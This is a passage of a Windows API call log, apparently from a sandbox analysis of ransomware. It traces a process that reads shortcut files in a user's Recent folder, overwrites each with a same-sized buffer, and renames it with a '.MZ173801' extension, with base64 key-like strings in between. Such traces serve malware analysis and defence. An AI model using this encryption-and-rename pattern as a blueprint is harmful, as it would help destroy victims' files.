lpDistanceToMoveHigh=0x19f99c*=0) returned 0x297 [0110.714] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.714] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x297, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x297, lpOverlapped=0x0) returned 1 [0110.715] CloseHandle (hObject=0x3f4) returned 1 [0110.715] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qMCV4VrTY-vx5.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qmcv4vrty-vx5.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.716] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x297, lpOverlapped=0x0) returned 1 [0110.717] CloseHandle (hObject=0x3f4) returned 1 [0110.718] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qMCV4VrTY-vx5.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qmcv4vrty-vx5.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qMCV4VrTY-vx5.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qmcv4vrty-vx5.lnk.mz173801")) returned 1 [0110.719] GetCurrentThreadId () returned 0x1358 [0110.719] GetCurrentThreadId () returned 0x1358 [0110.719] GetCurrentThreadId () returned 0x1358 [0110.719] GetCurrentThreadId () returned 0x1358 [0110.719] GetCurrentThreadId () returned 0x1358 [0110.719] GetCurrentThreadId () returned 0x1358 [0110.719] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b98dc3, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x88b98dc3, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x88b98dc3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="QWOw3VER.lnk", cAlternateFileName="")) returned 1 [0110.719] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.719] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.719] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\QWOw3VER.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qwow3ver.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b98dc3, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x88b98dc3, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x88b98dc3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3b0)) returned 1 [0110.720] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.720] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.721] GetCurrentThreadId () returned 0x1358 [0110.721] GetCurrentThreadId () returned 0x1358 [0110.721] GetCurrentThreadId () returned 0x1358 [0110.721] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.721] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.722] GetCurrentThreadId () returned 0x1358 [0110.722] GetCurrentThreadId () returned 0x1358 [0110.722] GetCurrentThreadId () returned 0x1358 [0110.722] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\QWOw3VER.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qwow3ver.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.722] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.722] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.001] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3b0 [0111.001] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.056] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3b0, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3b0, lpOverlapped=0x0) returned 1 [0111.057] CloseHandle (hObject=0x3f4) returned 1 [0111.057] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\QWOw3VER.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qwow3ver.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.058] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3b0, lpOverlapped=0x0) returned 1 [0111.059] CloseHandle (hObject=0x3f4) returned 1 [0111.060] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\QWOw3VER.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qwow3ver.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\QWOw3VER.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qwow3ver.lnk.mz173801")) returned 1 [0111.061] GetCurrentThreadId () returned 0x1358 [0111.061] GetCurrentThreadId () returned 0x1358 [0111.061] GetCurrentThreadId () returned 0x1358 [0111.061] GetCurrentThreadId () returned 0x1358 [0111.061] GetCurrentThreadId () returned 0x1358 [0111.061] GetCurrentThreadId () returned 0x1358 [0111.061] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3b904a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec3b904a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec3b904a, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="rAI6kR Z24Gt07MNyb.lnk", cAlternateFileName="RAI6KR~1.LNK")) returned 1 [0111.061] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.061] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.061] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rAI6kR Z24Gt07MNyb.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rai6kr z24gt07mnyb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3b904a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec3b904a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec3b904a, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x540)) returned 1 [0111.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.062] GetCurrentThreadId () returned 0x1358 [0111.062] GetCurrentThreadId () returned 0x1358 [0111.062] GetCurrentThreadId () returned 0x1358 [0111.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 